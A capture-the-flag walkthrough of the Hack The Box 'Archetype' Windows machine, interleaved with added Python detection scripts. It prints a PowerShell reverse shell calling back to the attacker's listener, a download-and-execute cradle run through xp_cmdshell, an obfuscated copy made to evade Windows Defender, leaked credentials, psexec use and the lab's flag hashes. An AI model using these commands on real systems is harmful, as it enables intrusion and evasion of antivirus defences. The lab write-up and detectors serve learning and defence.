As I had some time off today and had only recently found https://app.hackthebox.eu, I decided to spend some time on their “Starting Point” lab machine set and have some fun shaking the rust off my memory.
The first machine we are doing a simple penetration test on is called Archetype, and apparently it is a Windows machine. Let us start by enumerating the services with nmap:
$nmap -sV -sC 10.10.10.27 -p-
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-03 19:43 CEST
Nmap scan report for 10.10.10.27
Host is up (0.093s latency).
Not shown: 65523 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-04-03T18:03:14
|_Not valid after: 2051-04-03T18:03:14
|_ssl-date: 2021-04-03T18:07:42+00:00; +21m24s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h45m24s, deviation: 3h07m50s, median: 21m23s
| ms-sql-info:
| 10.10.10.27:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-04-03T11:07:33-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-04-03T18:07:36
|_ start_date: N/A
We can see that it is a Windows machine sharing files via SMB, and the scan's SMB scripts got in as guest, without providing any username or password. Let us see what shares we can list:
$smbclient -N -L \\\\10.10.10.27
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
We can see a backups share that turns out to be accessible to everyone. Connecting to it without a password:
$smbclient \\\\10.10.10.27\\backups
Enter WORKGROUP\alacrau's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 20 13:20:57 2020
.. D 0 Mon Jan 20 13:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 13:23:02 2020
10328063 blocks of size 4096. 8208731 blocks available
smb: \>
smb: \> pwd
Current directory is \\10.10.10.27\backups\
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
Let us now investigate the content of this prod.dtsConfig file:
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
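Added example, not part of the original write-up: a small Python check a defender could run over file shares and backup folders to catch files like the one above before they sit world-readable. It parses the DTSConfiguration / Configuration / ConfiguredValue structure seen in prod.dtsConfig and flags any connection string carrying a Password or Pwd key, reporting only the secret's length rather than the secret itself. The first sample reproduces the file from the page; the second, integrated-authentication sample and all function names are my own.

```python
"""Scan SSIS .dtsConfig files for connection strings that embed a password.

Added example (not part of the original write-up). SAMPLE_LEAKY mirrors the
prod.dtsConfig found on the backups share; SAMPLE_INTEGRATED is constructed and
uses integrated authentication, so it should produce no finding.
"""
import xml.etree.ElementTree as ET

SAMPLE_LEAKY = r"""<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>"""

# Constructed counter-example: same package, but Windows authentication, no secret.
SAMPLE_INTEGRATED = r"""<DTSConfiguration>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Integrated Security=SSPI;Initial Catalog=Catalog;Provider=SQLNCLI10.1;</ConfiguredValue>
</Configuration>
</DTSConfiguration>"""

# Connection-string keys whose value is a clear-text secret (compared lowercase).
SECRET_KEYS = ("password", "pwd")


def parse_connection_string(value):
    """Split an OLE DB / ODBC style 'Key=Value;Key=Value' string into a dict with lowercase keys."""
    pairs = {}
    for part in value.split(";"):
        key, sep, val = part.partition("=")
        if sep:
            pairs[key.strip().lower()] = val.strip()
    return pairs


def find_embedded_passwords(xml_text):
    """Return one finding per <Configuration> whose ConfiguredValue carries a password.

    The secret itself is never copied into the finding, only its length, so the
    scanner's report cannot become a second copy of the credential.
    """
    findings = []
    for conf in ET.fromstring(xml_text).iter("Configuration"):
        value_el = conf.find("ConfiguredValue")
        if value_el is None or not value_el.text:
            continue
        pairs = parse_connection_string(value_el.text)
        for key in SECRET_KEYS:
            if pairs.get(key):
                findings.append({
                    "path": conf.get("Path", ""),
                    "user": pairs.get("user id") or pairs.get("uid") or "<unknown>",
                    "secret_key": key,
                    "secret_length": len(pairs[key]),
                    # Persist Security Info=True keeps the password inside the open
                    # connection object too, so it is reported alongside the leak.
                    "persist_security_info": pairs.get("persist security info", "").lower() == "true",
                })
    return findings


if __name__ == "__main__":
    for finding in find_embedded_passwords(SAMPLE_LEAKY):
        print("LEAK:", finding)
    print("integrated sample findings:", find_embedded_passwords(SAMPLE_INTEGRATED))
```

Run it as a script to see the single finding for the page's file and an empty list for the integrated-auth variant; pointing it at a directory of *.dtsConfig files is a matter of reading each file and passing the text to find_embedded_passwords.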
We stumble on our first loot file: looking through this configuration, it contains the credentials of a SQL user, sql_svc:
- username: sql_svc
- password: M3g4c0rp123
Let us try to log in with these credentials, but first let us search Metasploit for MSSQL modules to see if we can find anything interesting:
msf6 > search mssql
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/misc/ais_esel_server_rce 2019-03-27 excellent Yes AIS logistics ESEL-Server Unauth SQL Injection RCE
1 auxiliary/server/capture/mssql normal No Authentication Capture: MSSQL
(...)
31 auxiliary/admin/mssql/mssql_exec normal No Microsoft SQL Server xp_cmdshell Command Execution
So auxiliary module 31 looks interesting (and is quite notorious):
Description:
This module will execute a Windows command on a MSSQL/MSDE instance
via the xp_cmdshell procedure. A valid username and password is
required to use this module
References:
http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx
Let us use it (msf6 > use 31) and set up the module parameters:
msf6 > set PASSWORD M3g4c0rp123
PASSWORD => M3g4c0rp123
msf6 > set USERNAME sql_svc
USERNAME => sql_svc
msf6 > set RHOSTS 10.10.10.27
RHOSTS => 10.10.10.27
msf6 > set USE_WINDOWS_AUTHENT true
USE_WINDOWS_AUTHENT => true
msf6 > set DOMAIN ARCHETYPE
DOMAIN => ARCHETYPE
msf6 > use auxiliary/admin/mssql/mssql_exec
msf6 auxiliary(admin/mssql/mssql_exec) > show options
Module options (auxiliary/admin/mssql/mssql_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD cmd.exe /c echo OWNED > C:\owned.exe no Command to execute
PASSWORD M3g4c0rp123 no The password for the specified username
RHOSTS 10.10.10.27 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1433 yes The target port (TCP)
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
USERNAME sql_svc no The username to authenticate as
USE_WINDOWS_AUTHENT true yes Use windows authentification (requires DOMAIN option set)
msf6 auxiliary(admin/mssql/mssql_exec) > exploit
....
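The module above works by sending EXEC master..xp_cmdshell, which makes the SQL Server service process itself spawn a command shell on the host. Added example, not from the write-up and not part of Metasploit: Python detection logic for exactly that behaviour, run over constructed SQL Server ERRORLOG lines (xp_cmdshell being switched on) and constructed process-creation events (sqlservr.exe as the parent of cmd.exe or powershell.exe). The JSON field layout is modelled on Sysmon's process-creation event, which is my assumption about the collector; the function names are mine.

```python
"""Detect xp_cmdshell abuse from SQL Server and host telemetry.

Added example, not from the original write-up. Two signals are checked:
  1. ERRORLOG lines recording that the xp_cmdshell option went from 0 to 1.
  2. Process-creation events where sqlservr.exe is the parent of a shell.
All sample lines are constructed for this example.
"""
import json
import re
from pathlib import PureWindowsPath

# Constructed ERRORLOG excerpt: enabling 'show advanced options', then xp_cmdshell, later disabling it.
ERRORLOG_LINES = [
    "2021-04-03 18:07:40.12 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2021-04-03 18:07:40.13 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2021-04-03 18:30:02.00 spid53      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.",
]

# Constructed process-creation events, one JSON object per line (Sysmon-like field names, an assumption).
PROCESS_EVENTS = [
    r'{"Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cmd.exe", "User": "ARCHETYPE\\alice"}',
    r'{"Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Program Files\\Microsoft SQL Server\\MSSQL14.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe", "CommandLine": "cmd.exe /c echo OWNED > C:\\owned.exe", "User": "ARCHETYPE\\sql_svc"}',
    r'{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Microsoft SQL Server\\MSSQL14.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe", "CommandLine": "powershell whoami", "User": "ARCHETYPE\\sql_svc"}',
    r'{"Image": "C:\\Program Files\\Microsoft SQL Server\\MSSQL14.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe", "ParentImage": "C:\\Windows\\System32\\services.exe", "CommandLine": "sqlservr.exe -sMSSQLSERVER", "User": "NT SERVICE\\MSSQLSERVER"}',
]

XP_CMDSHELL_CHANGE = re.compile(
    r"Configuration option 'xp_cmdshell' changed from (?P<old>\d+) to (?P<new>\d+)")
# Interpreters that xp_cmdshell abuse typically launches directly under sqlservr.exe.
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "cscript.exe", "wscript.exe"}


def xp_cmdshell_enabled_lines(lines):
    """Return the ERRORLOG lines where xp_cmdshell went from off (0) to on (1)."""
    hits = []
    for line in lines:
        m = XP_CMDSHELL_CHANGE.search(line)
        if m and m.group("old") == "0" and m.group("new") == "1":
            hits.append(line)
    return hits


def shells_spawned_by_sql_server(json_lines):
    """Return (user, shell image, command line) for shells whose parent is sqlservr.exe.

    Only the basenames are compared, case-insensitively, so the install path of
    the SQL Server instance does not matter.
    """
    hits = []
    for raw in json_lines:
        event = json.loads(raw)
        parent = PureWindowsPath(event.get("ParentImage", "")).name.lower()
        child = PureWindowsPath(event.get("Image", "")).name.lower()
        if parent == "sqlservr.exe" and child in SHELL_IMAGES:
            hits.append((event.get("User", ""), child, event.get("CommandLine", "")))
    return hits


if __name__ == "__main__":
    for line in xp_cmdshell_enabled_lines(ERRORLOG_LINES):
        print("xp_cmdshell enabled:", line)
    for user, shell, cmdline in shells_spawned_by_sql_server(PROCESS_EVENTS):
        print(f"shell under sqlservr.exe: user={user} image={shell} cmd={cmdline}")
```

The second signal is the more robust one: even when xp_cmdshell was already enabled long ago (so no ERRORLOG line appears in the window you are looking at), a cmd.exe or powershell.exe whose parent is sqlservr.exe is rare in normal operation and worth an alert on its own.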
After running this command we can easily confirm that the machine is exploitable, as we get the output of our command back, so we can start working on obtaining shell access. Our reverse shell, which we will kindly name lol.ps1 and which is taken from https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1, connects back to our local netcat listener:
$sm=(New-Object Net.Sockets.TCPClient('10.10.14.167',4242)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
Let us also fire up our nc listener on port 4242 so it can wait for connections from the reverse shell above:
$nc -lvnp 4242
listening on [any] 4242 ..
We will now start a web server to serve our reverse shell script so we can download it from inside the machine:
python -m http.server
This spawns an HTTP server on our machine on port 8000 to serve our PowerShell reverse shell. Then we set the command in Metasploit and run the module:
set CMD powershell 'IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.167:8000/lol.ps1\");'
When we run it, we get an antivirus message for trying to execute our shell script:
msf6 auxiliary(admin/mssql/mssql_exec) > set CMD powershell 'IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.167:8000/lol.ps1\");'
CMD => powershell IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.167:8000/lol.ps1\");
msf6 auxiliary(admin/mssql/mssql_exec) > exploit
[*] Running module against 10.10.10.27
[*] 10.10.10.27:1433 - SQL Query: EXEC master..xp_cmdshell 'powershell IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.167:8000/lol.ps1\");'
output
------
IEX : At line:1 char:1
+ $client = New-Object System.Net.Sockets.TCPClient("10.10.14.167",4242 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:1
+ IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.167:80 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
[*] Auxiliary module execution completed
In order to bypass this we need to obfuscate our PowerShell code so that Windows Defender does not detect it. For this task we used ISESteroids, obtainable from http://www.powertheshell.com/isesteroids/; after running its “Obfuscate” tool on our script we obtain a new one:
${____/\/=\/==\__/\}=(New-Object Net.Sockets.TCPClient($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MQAwAC4AMQAwAC4AMQA0AC4AMQA2ADcA'))),4242)).GetStream();[byte[]]${__/\_/=\_/\__/=\/}=0..65535|%{0};while((${___/\/=======\/\/}=${____/\/=\/==\__/\}.Read(${__/\_/=\_/\__/=\/},0,${__/\_/=\_/\__/=\/}.Length)) -ne 0){;${__/\/\/==\/=\/\_/}=(New-Object Text.ASCIIEncoding).GetString(${__/\_/=\_/\__/=\/},0,${___/\/=======\/\/});${_/==\___/=\/\__/=}=([text.encoding]::ASCII).GetBytes((iex ${__/\/\/==\/=\/\_/} 2>&1));${____/\/=\/==\__/\}.Write(${_/==\___/=\/\__/=},0,${_/==\___/=\/\__/=}.Length)}
As we can see above, our variable names were obfuscated and our IP address was Base64-encoded. When we now run the module from Metasploit again, we get a hit on our netcat session:
$nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.14.167] from (UNKNOWN) [10.10.10.27] 49678
whoami
archetype\sql_svc
As we now have a shell, we can start going through the privilege escalation checklist at https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#system-info, and we get a hit when checking the PowerShell command history:
pwd
C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline
dir
ConsoleHost_history.txt
type ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!! exit
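Added example, not part of the original write-up: a scanner for the kind of file found above. PSReadline appends every interactive command to ConsoleHost_history.txt, so a password typed inline (as in net use ... /user:administrator <password>) survives on disk in clear text for anyone who can read the profile. The history lines below are constructed for this example (the net.exe line mirrors the one found on the box, the 'Winter2021!' value is made up), and the pattern names and functions are my own.

```python
"""Flag PowerShell history lines that pass a credential on the command line.

Added example, not from the original write-up. Scans PSReadline's
ConsoleHost_history.txt for commands carrying a literal secret as an argument
and reports the line, the kind of command and the account, with the secret
itself reduced to its length.
"""
import re

# A quoted value is matched whole, otherwise up to the next whitespace.
VALUE = r"'[^']*'|\"[^\"]*\"|\S+"
PATTERNS = [
    ("net use with inline password",
     re.compile(r"\bnet(?:\.exe)?\s+use\b.*?/user:(?P<user>\S+)\s+(?P<secret>" + VALUE + r")", re.I)),
    ("-Password parameter",
     re.compile(r"-Password\s+(?P<secret>" + VALUE + r")", re.I)),
    ("ConvertTo-SecureString -AsPlainText",
     re.compile(r"ConvertTo-SecureString\s+(?P<secret>" + VALUE + r").*?-AsPlainText", re.I)),
]

# Constructed history; line 2 mirrors the command found on the box.
HISTORY_LINES = [
    r"Get-ChildItem C:\Users\sql_svc\Desktop",
    r"net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!! exit",
    r"Set-LocalUser -Name svc_backup -Password (Read-Host -AsSecureString)",
    r"$sec = ConvertTo-SecureString 'Winter2021!' -AsPlainText -Force",
    r"exit",
]


def is_literal_secret(value):
    """False for variables and sub-expressions such as $cred or (Read-Host ...), which carry no secret text."""
    return not value.startswith(("$", "("))


def scan_history(lines):
    """Return one finding per line that carries a literal secret; the secret is reported only as a length."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        for kind, pattern in PATTERNS:
            m = pattern.search(line)
            if not m or not is_literal_secret(m.group("secret")):
                continue
            secret = m.group("secret").strip("'\"")
            findings.append({
                "line": lineno,
                "kind": kind,
                "user": m.groupdict().get("user") or "",
                "secret_length": len(secret),
            })
            break  # one finding per line is enough
    return findings


if __name__ == "__main__":
    for finding in scan_history(HISTORY_LINES):
        print(finding)
```

Line 3 of the sample is the safe way to do the same job (the password is read from a prompt, not typed into the command) and is deliberately not reported; that is what the is_literal_secret check is for.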
We can now use Impacket's psexec.py (https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/psexec.py) to get a remote shell with our newly found credentials:
$python3 psexec.py administrator@10.10.10.27
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file PtMMrPNw.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service SGjW on 10.10.10.27.....
[*] Starting service SGjW.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>
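The session above shows what psexec.py leaves behind: a randomly named executable uploaded to ADMIN$ (the Windows directory) and a randomly named service started to run it; Sysinternals PsExec does the same with the fixed name PSEXESVC. Both produce a System-log event 7045 (a service was installed). Added example, not from the write-up or from Impacket: Python detection logic over constructed 7045-style records. The field names (ServiceName, ImagePath, AccountName) follow event 7045, the thresholds in looks_random are my own, and registering the Impacket binary under %systemroot% is my assumption about the tool's behaviour.

```python
"""Flag service-installation (event 7045) records that match psexec-style remote execution.

Added example, not from the original write-up. Records are constructed for
this example; only the first and fourth should be reported.
"""
import json
import re

SERVICE_EVENTS = [
    r'{"ServiceName": "SGjW", "ImagePath": "%systemroot%\\PtMMrPNw.exe", "AccountName": "LocalSystem"}',
    r'{"ServiceName": "Spooler", "ImagePath": "C:\\Windows\\System32\\spoolsv.exe", "AccountName": "LocalSystem"}',
    r'{"ServiceName": "MpsSvc", "ImagePath": "C:\\Windows\\System32\\svchost.exe -k LocalServiceNoNetworkFirewall", "AccountName": "NT AUTHORITY\\LocalService"}',
    r'{"ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe", "AccountName": "LocalSystem"}',
    r'{"ServiceName": "BITS", "ImagePath": "C:\\Windows\\System32\\svchost.exe -k netsvcs", "AccountName": "LocalSystem"}',
]

LETTERS_ONLY = re.compile(r"^[A-Za-z]{4,8}$")
KNOWN_REMOTE_EXEC_SERVICES = {"psexesvc"}
# Executable path up to the first .exe, ignoring a leading quote and any arguments.
EXE_PATH = re.compile(r'^"?(?P<exe>.*?\.exe)', re.I)


def looks_random(name):
    """Short, letters-only, mixed-case names with upper-case letters after the first character (SGjW, PtMMrPNw)."""
    return (bool(LETTERS_ONLY.match(name))
            and any(c.islower() for c in name)
            and any(c.isupper() for c in name[1:]))


def exe_name(image_path):
    """Basename of the executable in an ImagePath, or '' if none is found."""
    m = EXE_PATH.match(image_path.strip())
    return m.group("exe").rpartition("\\")[2] if m else ""


def image_in_windows_root(image_path):
    """True when the executable sits directly in the Windows directory or an ADMIN$ share path."""
    m = EXE_PATH.match(image_path.strip())
    if not m:
        return False
    directory = m.group("exe").rpartition("\\")[0].lower()
    return directory in ("%systemroot%", "c:\\windows") or directory.endswith("\\admin$")


def suspicious_service_installs(json_lines):
    """Return (service name, exe, reason) for records that look like remote-execution tooling."""
    hits = []
    for raw in json_lines:
        event = json.loads(raw)
        name = event.get("ServiceName", "")
        image = event.get("ImagePath", "")
        exe = exe_name(image)
        if name.lower() in KNOWN_REMOTE_EXEC_SERVICES:
            hits.append((name, exe, "known remote-execution service name"))
        elif looks_random(name) and image_in_windows_root(image) and looks_random(exe.rsplit(".", 1)[0]):
            hits.append((name, exe, "random service name and binary dropped in the Windows directory"))
    return hits


if __name__ == "__main__":
    for name, exe, reason in suspicious_service_installs(SERVICE_EVENTS):
        print(f"{name} ({exe}): {reason}")
```

The MpsSvc record is there on purpose: its name passes the random-looking test, but its binary lives in System32 rather than the Windows root, so both conditions have to hold before a record is reported.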
As we now have an admin shell on this machine, we can look around for the flags. We find the root flag in the Administrator's “Desktop” folder:
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is CE13-2325
Directory of C:\Users\Administrator\Desktop
01/20/2020 06:42 AM <DIR> .
01/20/2020 06:42 AM <DIR> ..
02/25/2020 07:36 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 33,834,831,872 bytes free
C:\Users\Administrator\Desktop>type root.txt
b91ccec3305e98240082d4474b848528
C:\Users\Administrator\Desktop>
As we forgot it earlier, the user flag can be collected from the sql_svc user's Desktop folder:
C:\Users\sql_svc\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is CE13-2325
Directory of C:\Users\sql_svc\Desktop
01/20/2020 06:42 AM <DIR> .
01/20/2020 06:42 AM <DIR> ..
02/25/2020 07:37 AM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 33,833,373,696 bytes free
C:\Users\sql_svc\Desktop>type user.txt
3e7b102e78218e935bf3f4951fec21a3
C:\Users\sql_svc\Desktop>
Our flags for this challenge are then:
- user: 3e7b102e78218e935bf3f4951fec21a3
- admin: b91ccec3305e98240082d4474b848528
Easy but fun. This platform is quite cool, so I guess I’ll keep exploring; please ping me if you have any doubts.